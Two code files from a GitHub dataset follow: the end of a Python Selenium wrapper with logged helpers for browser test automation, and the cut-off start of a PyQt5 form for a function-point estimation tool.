'''\r\n        Operation input box.\r\n        Usage:\r\n        locator = (\"id\", \"xxx\")\r\n        driver.send_keys(locator,text)\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            el.send_keys(text)\r\n            self.my_print(\"{0} Typed element: <{1}> content: {2}, Spend {3} seconds\".format(\r\n                success, locator, text, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to type element: <{1}> content: {2}, Spend {3} seconds\".format(\r\n                fail, locator, text, time.time() - t1))\r\n            raise\r\n\r\n    def clear_send_keys(self, locator, text):\r\n        \"\"\"\r\n        Clear and input element.\r\n\r\n        Usage:\r\n        driver.clear_send_keys((\"id\", \"kw\"),\"selenium\")\r\n        \"\"\"\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            el.clear()\r\n            el.send_keys(text)\r\n            self.my_print(\"{0} Clear and type element: <{1}> content: {2}, Spend {3} seconds\".format(\r\n                success, locator, text, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to clear and type element: <{1}> content: {2}, Spend {3} seconds\".format(\r\n                fail, locator, text, time.time() - t1))\r\n            raise\r\n\r\n    def send_keys_and_enter(self, locator, text, secs=0.5):\r\n        \"\"\"\r\n        Operation input box. 
1. input message, sleep 0.5s; 2. input ENTER.\r\n\r\n        Usage:\r\n        driver.send_keys_and_enter(('id','kw'),'beck')\r\n        \"\"\"\r\n        t1 = time.time()\r\n        try:\r\n            ele = self.find_element(locator)\r\n            ele.send_keys(text)\r\n            time.sleep(secs)\r\n            ele.send_keys(Keys.ENTER)\r\n            self.my_print(\"{0} Element <{1}> type content: {2},and sleep {3} seconds,input ENTER key, Spend {4} seconds\".format(\r\n                success, locator, text, secs, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable element <{1}> type content: {2},and sleep {3} seconds,input ENTER key, Spend {4} seconds\".\r\n                          format(fail, locator, text, secs, time.time() - t1))\r\n            raise\r\n\r\n    def click(self, locator):\r\n        '''\r\n        Click operation\r\n        Usage:\r\n        locator = (\"id\",\"xxx\")\r\n        driver.click(locator)\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            el.click()\r\n            self.my_print(\"{0} Clicked element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to click element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n            raise\r\n\r\n    def right_click(self, locator):\r\n        '''\r\n        Right click element with the mouse.\r\n        Usage:\r\n        driver.right_click((\"id\",\"kw\"))\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            ActionChains(self.driver).context_click(el).perform()\r\n            self.my_print(\"{0} Right click element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\r\n                \"{0} Unable to right click element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n            raise\r\n\r\n    def double_click(self, locator):\r\n        '''\r\n        Double click element.\r\n\r\n        Usage:\r\n        driver.double_click((\"id\",\"kw\"))\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            ActionChains(self.driver).double_click(el).perform()\r\n            self.my_print(\"{0} Double click element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\r\n                \"{0} Unable to double click element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n            raise\r\n\r\n    def drag_and_drop(self, locator, target_locator):\r\n        '''\r\n        Drags an element a certain distance and then drops it.\r\n        Usage:\r\n        driver.drag_and_drop((\"id\",\"kw\"),(\"id2\",\"kw2\"))\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            element = self.find_element(locator)\r\n            target = self.find_element(target_locator)\r\n            ActionChains(self.driver).drag_and_drop(element, target).perform()\r\n            self.my_print(\"{0} Drag and drop element: <{1}> to element: <{2}>, Spend {3} seconds\".format(\r\n                success, locator, target_locator, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to drag and drop element: <{1}> to element: <{2}>, Spend {3} seconds\".format(\r\n                fail, locator, target_locator, time.time() - t1))\r\n            raise\r\n\r\n    def submit(self, locator):\r\n        '''\r\n        Submit the specified form.\r\n\r\n        Usage:\r\n        driver.submit((\"id\",\"kw\"))\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            el.submit()\r\n            self.my_print(\r\n                \"{0} Submit form args element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\r\n                \"{0} Unable to submit form args element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n            raise\r\n\r\n    def F5(self):\r\n        '''\r\n        Refresh the current page.\r\n\r\n        Usage:\r\n        driver.F5()\r\n        
'''\r\n        t1 = time.time()\r\n        self.driver.refresh()\r\n        self.my_print(\"{0} Refresh the current page, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n    def is_element_exist(self, locator):\r\n        \"\"\"\r\n        Judge whether the element exists; the return result is True or False.\r\n\r\n        Usage:\r\n        driver.is_element_exist((\"id\",\"kw\"))\r\n        \"\"\"\r\n        t1 = time.time()\r\n        try:\r\n            self.driver.find_element(*locator)\r\n            self.my_print(\"{0} Element: <{1}> is exist, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n            return True\r\n        except NoSuchElementException:\r\n            self.my_print(\"{0} Element: <{1}> is not exist, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n            return False\r\n\r\n    def is_text_in_element(self, locator, text, timeout=10):\r\n        '''\r\n        Judge whether the text is in the element; returns a boolean\r\n        usage:\r\n        locator = (\"id\", \"xxx\")\r\n        text = \"\"\r\n        result = driver.is_text_in_element(locator,text)\r\n        '''\r\n        try:\r\n            result = WebDriverWait(self.driver, timeout, 1).until(EC.text_to_be_present_in_element(locator, text))\r\n        except TimeoutException:\r\n            print(\"Element not located: \" + str(locator))\r\n            nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n            self.driver.get_screenshot_as_file(screen_file + \"%s.jpg\" % nowTime)\r\n            return False\r\n        else:\r\n            return result\r\n\r\n    def is_value_in_element(self, locator, value, timeout=10):\r\n        '''\r\n        Judge whether the value is in the element's value attribute; returns a boolean\r\n        usage:\r\n        locator = (\"id\", \"xxx\")\r\n        value = \"\"\r\n        result = driver.is_value_in_element(locator,value)\r\n        '''\r\n        try:\r\n            result = WebDriverWait(self.driver, timeout, 1).until(EC.text_to_be_present_in_element_value(locator, value))\r\n        except TimeoutException:\r\n            print(\"Element not located: \" + str(locator))\r\n            nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n            self.driver.get_screenshot_as_file(screen_file + \"%s.jpg\" % nowTime)\r\n            return False\r\n        else:\r\n            return result\r\n\r\n    def is_title(self, title, timeout=10):\r\n        # Judge whether title equals driver.title\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.title_is(title))\r\n        return result\r\n\r\n    def is_title_contains(self, str, timeout=10):\r\n        # Judge whether the string is contained in driver.title\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.title_contains(str))\r\n        return result\r\n\r\n    def is_selected(self, locator, timeout=10):\r\n        # Judge whether the element is selected; returns a boolean\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.element_located_to_be_selected(locator))\r\n        return result\r\n\r\n    def is_selected_be(self, locator, selected=True, timeout=10):\r\n        # Judge the element's state against the expected selected value (True/False); returns a boolean\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.element_located_selection_state_to_be(locator, selected))\r\n        return result\r\n\r\n    def is_alert_present(self, timeout=10):\r\n        # Judge whether the page has an alert; returns the alert if present, otherwise False\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.alert_is_present())\r\n        return result\r\n\r\n    def is_visibility(self, locator, timeout=10):\r\n        '''Returns the element itself if visible, otherwise False'''\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.visibility_of_element_located(locator))\r\n        return result\r\n\r\n    def is_invisibility(self, locator, timeout=10):\r\n        '''Returns True if the element is invisible; also returns True if the element is not found'''\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.invisibility_of_element_located(locator))\r\n        return result\r\n\r\n    def is_clickable(self, locator, timeout=10):\r\n        '''Returns the element itself if it is clickable (is_enabled), otherwise False'''\r\n        result = WebDriverWait(self.driver, timeout, 1).until(EC.element_to_be_clickable(locator))\r\n        return result\r\n\r\n    def is_located(self, locator, timeout=10):\r\n        '''Judge whether the element can be located (which does not mean it is visible); returns the element if located, otherwise False'''\r\n
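        # presence_of_element_located only checks that the node is in the DOM, not that it is visible\r\n        result = 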
WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_element_located(locator))\r\n        return result\r\n\r\n    def move_to_element(self, locator):\r\n        # Mouse hover operation\r\n        element = self.find_element(locator)\r\n        ActionChains(self.driver).move_to_element(element).perform()\r\n\r\n    def back(self):\r\n        # Browser page back\r\n        self.driver.back()\r\n\r\n    def forward(self):\r\n        # Browser page forward\r\n        self.driver.forward()\r\n\r\n    def close(self):\r\n        \"\"\"\r\n        Simulates the user clicking the \"close\" button in the titlebar of a popup\r\n        window or tab.\r\n\r\n        Usage:\r\n        driver.close()\r\n        \"\"\"\r\n        t1 = time.time()\r\n        self.driver.close()\r\n        self.my_print(\"{0} Closed current window, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n    def quit(self):\r\n        \"\"\"\r\n        Quit the driver and close all the windows.\r\n\r\n        Usage:\r\n        driver.quit()\r\n        \"\"\"\r\n        t1 = time.time()\r\n        self.driver.quit()\r\n        self.my_print(\"{0} Closed all window and quit the driver, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n    def get_title(self):\r\n        # Get driver.title\r\n        t1 = time.time()\r\n        title = self.driver.title\r\n        self.my_print(\"{0} Get current window title, Spend {1} seconds\".format(success, time.time() - t1))\r\n        return title\r\n\r\n    def get_text(self, locator):\r\n        \"\"\"\r\n        Get element text information.\r\n\r\n        Usage:\r\n        driver.get_text((\"id\",\"kw\"))\r\n        \"\"\"\r\n        t1 = time.time()\r\n        try:\r\n            element = self.find_element(locator)\r\n            text = element.text\r\n            self.my_print(\r\n                \"{0} Get element text element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n            return text\r\n        except Exception:\r\n            self.my_print(\r\n                \"{0} Unable to get element text element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n            raise\r\n\r\n    def get_url(self):\r\n        '''\r\n        Get the URL address of the current page.\r\n\r\n        Usage:\r\n        driver.get_url()\r\n        '''\r\n        t1 = time.time()\r\n        url = self.driver.current_url\r\n        self.my_print(\"{0} Get current window url, Spend {1} seconds\".format(success, time.time() - t1))\r\n        return url\r\n\r\n    def wait(self, secs):\r\n        \"\"\"\r\n        Implicitly wait. All elements on the page.\r\n\r\n        Usage:\r\n        driver.wait(10)\r\n        \"\"\"\r\n        t1 = time.time()\r\n        self.driver.implicitly_wait(secs)\r\n        self.my_print(\"{0} Set wait all element display in {1} seconds, Spend {2} seconds\".format(\r\n            success, secs, time.time() - t1))\r\n\r\n    def get_screenshot(self, file_path):\r\n        '''\r\n        Get the current window screenshot.\r\n\r\n        Usage:\r\n        driver.get_screenshot('/Screenshots/foo.jpg')\r\n        driver.get_screenshot('/Screenshots/foo.png')\r\n        '''\r\n        t1 = time.time()\r\n        try:\r\n            self.driver.get_screenshot_as_file(file_path)\r\n            self.my_print(\"{0} Get the current window screenshot,path: {1}, Spend {2} seconds\".format(\r\n                success, file_path, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to get the current window screenshot,path: {1}, Spend {2} seconds\".format(\r\n                fail, file_path, time.time() - t1))\r\n            raise\r\n\r\n    # def get_screenshot_as_base64(self):\r\n    #     self.driver.get_screenshot_as_base64()\r\n\r\n    def get_attribute(self, locator, name):\r\n        '''Get the value of the given attribute of an element'''\r\n        t1 = time.time()\r\n        try:\r\n            el = self.find_element(locator)\r\n            attribute = el.get_attribute(name)\r\n            self.my_print(\"{0} Get attribute element: <{1}>,attribute: {2}, Spend {3} seconds\".format(\r\n                success, locator, attribute, time.time() - t1))\r\n            return attribute\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to get attribute element: <{1}>,attribute: {2}, Spend 
{3} seconds\".format(fail,\r\n locator,\r\n attribute,\r\n time.time() - t1))\r\n raise\r\n\r\n def accept_alert(self):\r\n '''\r\n Accept warning box.\r\n\r\n Usage:\r\n driver.accept_alert()\r\n '''\r\n t1 = time.time()\r\n self.driver.switch_to.alert.accept()\r\n self.my_print(\"{0} Accept warning box, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def dismiss_alert(self):\r\n '''\r\n Dismisses the alert available.\r\n\r\n Usage:\r\n driver.dismiss_alert()\r\n '''\r\n t1 = time.time()\r\n self.driver.switch_to.alert.dismiss()\r\n self.my_print(\"{0} Dismisses the alert available, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def switch_to_frame(self, locator):\r\n '''\r\n Switch to the specified frame.\r\n\r\n Usage:\r\n driver.switch_to_frame((\"id\",\"kw\"))\r\n '''\r\n t1 = time.time()\r\n try:\r\n iframe_el = self.find_element(locator)\r\n self.driver.switch_to.frame(iframe_el)\r\n self.my_print(\r\n \"{0} Switch to frame element: <{1}>, Spend {2} seconds\".format(success, locator, time.time() - t1))\r\n except Exception:\r\n self.my_print(\r\n \"{0} Unable switch to frame element: <{1}>, Spend {2} seconds\".format(fail, locator, time.time() - t1))\r\n raise\r\n\r\n def switch_to_frame_out(self):\r\n '''\r\n Returns the current form machine form at the next higher level.\r\n Corresponding relationship with switch_to_frame () method.\r\n\r\n Usage:\r\n driver.switch_to_frame_out()\r\n '''\r\n t1 = time.time()\r\n self.driver.switch_to.default_content()\r\n self.my_print(\"{0} Switch to frame out, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n\r\n def open_new_window(self, locator):\r\n '''\r\n Open the new window and switch the handle to the newly opened window.\r\n\r\n Usage:\r\n driver.open_new_window()\r\n '''\r\n t1 = time.time()\r\n try:\r\n original_windows = self.driver.current_window_handle\r\n el = self.find_element(locator)\r\n el.click()\r\n all_handles = self.driver.window_handles\r\n for handle in all_handles:\r\n if handle != original_windows:\r\n self.driver.switch_to.window(handle)\r\n self.my_print(\"{0} Click element: <{1}> open a new window and swich into, Spend {2} seconds\".format(success,\r\n locator,\r\n time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Click element: <{1}> open a new window and swich into, Spend {2} seconds\".format(fail,\r\n locator,\r\n time.time() - t1))\r\n raise\r\n\r\n def into_new_window(self):\r\n \"\"\"\r\n Into the new window.\r\n\r\n Usage:\r\n dirver.into_new_window()\r\n \"\"\"\r\n t1 = time.time()\r\n try:\r\n all_handle = self.driver.window_handles\r\n flag = 0\r\n while len(all_handle) < 2:\r\n time.sleep(1)\r\n all_handle = self.driver.window_handles\r\n flag += 1\r\n if flag == 5:\r\n break\r\n self.driver.switch_to.window(all_handle[-1])\r\n self.my_print(\"{0} Switch to the new window,new window's url: {1}, Spend {2} seconds\".format(success,\r\n self.driver.current_url,time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable switch to the new window, Spend {1} seconds\".format(fail, time.time() - t1))\r\n raise\r\n\r\n def js_execute(self, js):\r\n '''执行js'''\r\n t1 = time.time()\r\n try:\r\n self.driver.execute_script(js)\r\n self.my_print(\r\n \"{0} Execute javascript scripts: {1}, Spend {2} seconds\".format(success, js, time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to execute javascript scripts: {1}, Spend {2} seconds\".format(fail,\r\n js,\r\n time.time() - t1))\r\n raise\r\n\r\n def js_focus_element(self, 
locator):\r\n        '''Focus the element: scroll it into view'''\r\n        target = self.find_element(locator)\r\n        self.driver.execute_script(\"arguments[0].scrollIntoView();\", target)\r\n\r\n    def js_scroll_top(self):\r\n        '''Scroll to the top of the page'''\r\n        js = \"window.scrollTo(0,0)\"\r\n        self.driver.execute_script(js)\r\n\r\n    def js_scroll_end(self):\r\n        '''Scroll to the bottom of the page'''\r\n        js = \"window.scrollTo(0,document.body.scrollHeight)\"\r\n        self.driver.execute_script(js)\r\n\r\n    def js_click(self, css):\r\n        \"\"\"\r\n        Input a css selector, use javascript to click the element.\r\n        Usage:\r\n        driver.js_click('#buttonid')\r\n        \"\"\"\r\n        t1 = time.time()\r\n        js_str = \"$('{0}').click()\".format(css)\r\n        try:\r\n            self.driver.execute_script(js_str)\r\n            self.my_print(\"{0} Use javascript click element: {1}, Spend {2} seconds\".format(success, js_str, time.time() - t1))\r\n        except Exception:\r\n            self.my_print(\"{0} Unable to use javascript click element: {1}, Spend {2} seconds\".format(\r\n                fail, js_str, time.time() - t1))\r\n            raise\r\n\r\n    def select_by_index(self, locator, index):\r\n        '''Select by index; index counts from 0'''\r\n        element = self.find_element(locator)\r\n        Select(element).select_by_index(index)\r\n\r\n    def select_by_value(self, locator, value):\r\n        '''Select by the value attribute'''\r\n        element = self.find_element(locator)\r\n        Select(element).select_by_value(value)\r\n\r\n    def select_by_text(self, locator, text):\r\n        '''Select by the visible text'''\r\n        element = self.find_element(locator)\r\n        Select(element).select_by_visible_text(text)\r\n\r\nif __name__ == '__main__':\r\n    # The code below is only for testing and debugging (self-test)\r\n    # driver = browser()\r\n    # Return a class instance: open the browser\r\n    driver_n = Wang(Browser())\r\n    # Open the url and, in passing, check that the opened page is right\r\n    driver_n.open(\"http://www.baidu.com\")\r\n    # Get the page title\r\n    input_loc = (\"id\", \"kw\")\r\n    print(driver_n.get_title())\r\n    # Type yoyo\r\n    el = driver_n.find_element(input_loc)\r\n    driver_n.send_keys(input_loc, \"yoyo\")\r\n    time.sleep(2)\r\n    # Clear the search box, type \"美女图片\" again and click search\r\n    driver_n.clear_send_keys(input_loc, \"美女图片\")\r\n    driver_n.click((\"id\",\"su\"))\r\n    # print (driver_n.is_text_in_element((\"name\", \"tj_trmap\"), \"地图\"))\r\n    # Hover the mouse over the settings button\r\n    set_loc = (\"link text\", \"设置\")\r\n    driver_n.move_to_element(set_loc)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"wanghaihong200/Wang-selenium","sub_path":"Wang-selenium/case/happy_public/wang_selenium.py","file_name":"wang_selenium.py","file_ext":"py","file_size_in_byte":31186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7806940679","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport SE_VAF, SE_select_language\nfrom decimal import Decimal\n\n\nclass Ui_Form(object):\n    counter = 0\n\n    def __init__(self, saved_dict):\n        self.displaylang_result = 0\n        self.lang = \"None\"\n        self.totalcount = 0\n        self.vaf_value = 0\n        self.fp = 0\n        self.new_dict = saved_dict\n        # print(\"Printing saved dict: {}\".format(saved_dict))\n        Ui_Form.counter += 1\n\n    def setupUi(self, Form, fpname):\n
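        # generated Qt Designer-style layout code: create and place the widgets first, signal wiring follows\n        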
Form.setObjectName(\"Form\")\n Form.resize(717, 603)\n self.label_12 = QtWidgets.QLabel(Form)\n self.label_12.setGeometry(QtCore.QRect(450, 60, 51, 16))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_12.setFont(font)\n self.label_12.setObjectName(\"label_12\")\n self.ILF_Label_2 = QtWidgets.QLabel(Form)\n self.ILF_Label_2.setGeometry(QtCore.QRect(580, 250, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.ILF_Label_2.setFont(font)\n self.ILF_Label_2.setObjectName(\"ILF_Label_2\")\n self.label_13 = QtWidgets.QLabel(Form)\n self.label_13.setGeometry(QtCore.QRect(350, 60, 51, 16))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_13.setFont(font)\n self.label_13.setObjectName(\"label_13\")\n self.horizontalLayoutWidget_6 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_6.setGeometry(QtCore.QRect(10, 140, 521, 31))\n self.horizontalLayoutWidget_6.setObjectName(\"horizontalLayoutWidget_6\")\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_6)\n self.horizontalLayout_6.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\n self.label_14 = QtWidgets.QLabel(self.horizontalLayoutWidget_6)\n self.label_14.setObjectName(\"label_14\")\n self.horizontalLayout_6.addWidget(self.label_14)\n self.EO_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_6)\n self.EO_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EO_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EO_lineedit_2.setObjectName(\"EO_lineedit_2\")\n self.horizontalLayout_6.addWidget(self.EO_lineedit_2)\n self.radioButton_16 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_6)\n self.radioButton_16.setObjectName(\"radioButton_16\")\n self.horizontalLayout_6.addWidget(self.radioButton_16)\n self.radioButton_17 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_6)\n self.radioButton_17.setObjectName(\"radioButton_17\")\n self.horizontalLayout_6.addWidget(self.radioButton_17)\n self.radioButton_18 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_6)\n self.radioButton_18.setObjectName(\"radioButton_18\")\n self.horizontalLayout_6.addWidget(self.radioButton_18)\n self.FP_Label_2 = QtWidgets.QLabel(Form)\n self.FP_Label_2.setGeometry(QtCore.QRect(580, 400, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.FP_Label_2.setFont(font)\n self.FP_Label_2.setObjectName(\"FP_Label_2\")\n self.label_15 = QtWidgets.QLabel(Form)\n self.label_15.setGeometry(QtCore.QRect(300, 10, 151, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.label_15.setFont(font)\n self.label_15.setObjectName(\"label_15\")\n self.EO_Label_2 = QtWidgets.QLabel(Form)\n self.EO_Label_2.setGeometry(QtCore.QRect(580, 150, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EO_Label_2.setFont(font)\n self.EO_Label_2.setObjectName(\"EO_Label_2\")\n self.EI_Label_2 = QtWidgets.QLabel(Form)\n self.EI_Label_2.setGeometry(QtCore.QRect(580, 100, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EI_Label_2.setFont(font)\n self.EI_Label_2.setObjectName(\"EI_Label_2\")\n self.Error_Label = QtWidgets.QLabel(Form)\n self.Error_Label.setGeometry(QtCore.QRect(200, 340, 371, 31))\n self.Error_Label.setFont(font)\n self.Error_Label.setObjectName(\"Error_Label\")\n self.Error_Label.setText(\"\")\n self.horizontalLayoutWidget_7 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_7.setGeometry(QtCore.QRect(10, 240, 521, 31))\n 
self.horizontalLayoutWidget_7.setObjectName(\"horizontalLayoutWidget_7\")\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_7)\n self.horizontalLayout_7.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\n self.label_16 = QtWidgets.QLabel(self.horizontalLayoutWidget_7)\n self.label_16.setObjectName(\"label_16\")\n self.horizontalLayout_7.addWidget(self.label_16)\n self.ILF_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_7)\n self.ILF_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.ILF_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.ILF_lineedit_2.setObjectName(\"ILF_lineedit_2\")\n self.horizontalLayout_7.addWidget(self.ILF_lineedit_2)\n self.radioButton_19 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_7)\n self.radioButton_19.setObjectName(\"radioButton_19\")\n self.horizontalLayout_7.addWidget(self.radioButton_19)\n self.radioButton_20 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_7)\n self.radioButton_20.setObjectName(\"radioButton_20\")\n self.horizontalLayout_7.addWidget(self.radioButton_20)\n self.radioButton_21 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_7)\n self.radioButton_21.setObjectName(\"radioButton_21\")\n self.horizontalLayout_7.addWidget(self.radioButton_21)\n self.TC_Label_2 = QtWidgets.QLabel(Form)\n self.TC_Label_2.setGeometry(QtCore.QRect(580, 340, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.TC_Label_2.setFont(font)\n self.TC_Label_2.setObjectName(\"TC_Label_2\")\n self.horizontalLayoutWidget_8 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_8.setGeometry(QtCore.QRect(10, 190, 521, 31))\n self.horizontalLayoutWidget_8.setObjectName(\"horizontalLayoutWidget_8\")\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_8)\n self.horizontalLayout_8.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\n self.label_17 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\n self.label_17.setObjectName(\"label_17\")\n self.horizontalLayout_8.addWidget(self.label_17)\n self.EInq_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_8)\n self.EInq_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EInq_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EInq_lineedit_2.setObjectName(\"EInq_lineedit_2\")\n self.horizontalLayout_8.addWidget(self.EInq_lineedit_2)\n self.radioButton_22 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_8)\n self.radioButton_22.setObjectName(\"radioButton_22\")\n self.horizontalLayout_8.addWidget(self.radioButton_22)\n self.radioButton_23 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_8)\n self.radioButton_23.setObjectName(\"radioButton_23\")\n self.horizontalLayout_8.addWidget(self.radioButton_23)\n self.radioButton_24 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_8)\n self.radioButton_24.setObjectName(\"radioButton_24\")\n self.horizontalLayout_8.addWidget(self.radioButton_24)\n self.Language_Label_2 = QtWidgets.QLabel(Form)\n self.Language_Label_2.setGeometry(QtCore.QRect(440, 500, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.Language_Label_2.setFont(font)\n self.Language_Label_2.setObjectName(\"Language_Label_2\")\n self.horizontalLayoutWidget_9 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_9.setGeometry(QtCore.QRect(10, 290, 521, 31))\n self.horizontalLayoutWidget_9.setObjectName(\"horizontalLayoutWidget_9\")\n self.horizontalLayout_9 = 
QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_9)\n self.horizontalLayout_9.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_9.setObjectName(\"horizontalLayout_9\")\n self.label_18 = QtWidgets.QLabel(self.horizontalLayoutWidget_9)\n self.label_18.setObjectName(\"label_18\")\n self.horizontalLayout_9.addWidget(self.label_18)\n self.EIF_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_9)\n self.EIF_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EIF_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EIF_lineedit_2.setObjectName(\"EIF_lineedit_2\")\n self.horizontalLayout_9.addWidget(self.EIF_lineedit_2)\n self.radioButton_25 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_9)\n self.radioButton_25.setObjectName(\"radioButton_25\")\n self.horizontalLayout_9.addWidget(self.radioButton_25)\n self.radioButton_26 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_9)\n self.radioButton_26.setObjectName(\"radioButton_26\")\n self.horizontalLayout_9.addWidget(self.radioButton_26)\n self.radioButton_27 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_9)\n self.radioButton_27.setObjectName(\"radioButton_27\")\n self.horizontalLayout_9.addWidget(self.radioButton_27)\n self.verticalLayoutWidget_2 = QtWidgets.QWidget(Form)\n self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(10, 380, 201, 201))\n self.verticalLayoutWidget_2.setObjectName(\"verticalLayoutWidget_2\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.computefp_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.computefp_btn_2.setObjectName(\"computefp_btn_2\")\n self.verticalLayout_2.addWidget(self.computefp_btn_2)\n self.vaf_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.vaf_btn_2.setObjectName(\"vaf_btn_2\")\n self.verticalLayout_2.addWidget(self.vaf_btn_2)\n self.codesize_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.codesize_btn_2.setObjectName(\"codesize_btn_2\")\n self.verticalLayout_2.addWidget(self.codesize_btn_2)\n self.chooselang_btn_2 = QtWidgets.QPushButton(self.verticalLayoutWidget_2)\n self.chooselang_btn_2.setObjectName(\"chooselang_btn_2\")\n self.verticalLayout_2.addWidget(self.chooselang_btn_2)\n self.CodeSize_Label_2 = QtWidgets.QLabel(Form)\n self.CodeSize_Label_2.setGeometry(QtCore.QRect(580, 490, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.CodeSize_Label_2.setFont(font)\n 